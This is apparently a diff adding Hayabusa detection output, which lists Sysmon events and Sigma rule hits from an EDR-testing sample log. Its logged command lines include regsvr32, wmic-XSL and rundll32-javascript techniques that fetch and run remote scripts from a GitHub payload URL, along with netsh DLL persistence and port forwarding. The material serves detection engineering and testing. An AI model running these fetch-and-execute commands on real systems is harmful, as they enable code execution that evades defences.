+2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 208 | PGUID: 747F3D96-6639-5D3F-0000-001074F48900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49829 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.340 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3240 | PGUID: 747F3D96-663D-5D3F-0000-00106F608A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-663D-5D3F-0000-001074658A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | LID: 0x413182 | PID: 5340 | PGUID: 747F3D96-663D-5D3F-0000-001062708A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4260 | PGUID: 747F3D96-6641-5D3F-0000-0010A38C8A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1516 | PGUID: 747F3D96-6641-5D3F-0000-001066918A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\Wmic_calc[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 5728 | PGUID: 747F3D96-6642-5D3F-0000-0010D6C98A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:56.665 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49830 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5084 | PGUID: 747F3D96-6646-5D3F-0000-0010E32E8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace show status | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4148 | PGUID: 747F3D96-6646-5D3F-0000-0010A7318B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3824 | PGUID: 747F3D96-6646-5D3F-0000-001051388B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6760 | PGUID: 747F3D96-6646-5D3F-0000-001029398B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3868 | PGUID: 747F3D96-6646-5D3F-0000-0010A7398B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace stop | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6232 | PGUID: 747F3D96-6646-5D3F-0000-0010913A8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace show status | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace show status | LID: 0x413182 | PID: 5760 | PGUID: 747F3D96-6647-5D3F-0000-0010F4648B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6647-5D3F-0000-0010AE6E8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace stop | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace stop | LID: 0x413182 | PID: 4568 | PGUID: 747F3D96-6647-5D3F-0000-001005738B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | LID: 0x413182 | PID: 5048 | PGUID: 747F3D96-6647-5D3F-0000-001065758B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | LID: 0x413182 | PID: 4028 | PGUID: 747F3D96-6647-5D3F-0000-001057768B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh.exe add helper AllTheThings.dll | LID: 0x413182 | PID: 5236 | PGUID: 747F3D96-6647-5D3F-0000-0010927C8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,PrivEsc,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5376 | PGUID: 747F3D96-6647-5D3F-0000-001052998B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6648-5D3F-0000-0010B9AB8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat | Process: C:\Windows\System32\dispdiag.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 3704 | PGUID: 747F3D96-6648-5D3F-0000-001092BB8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6836 | PGUID: 747F3D96-664D-5D3F-0000-0010F1498C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6056 | PGUID: 747F3D96-664D-5D3F-0000-0010114D8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 912 | PGUID: 747F3D96-664D-5D3F-0000-00108D5B8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 5572 | PGUID: 747F3D96-664D-5D3F-0000-0010BB5D8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5844 | PGUID: 747F3D96-6652-5D3F-0000-0010B9708C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5268 | PGUID: 747F3D96-6652-5D3F-0000-001059728C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 4888 | PGUID: 747F3D96-6653-5D3F-0000-001083BC8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:49831 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Evas | Exec,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1808 | PGUID: 747F3D96-6657-5D3F-0000-001029198D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
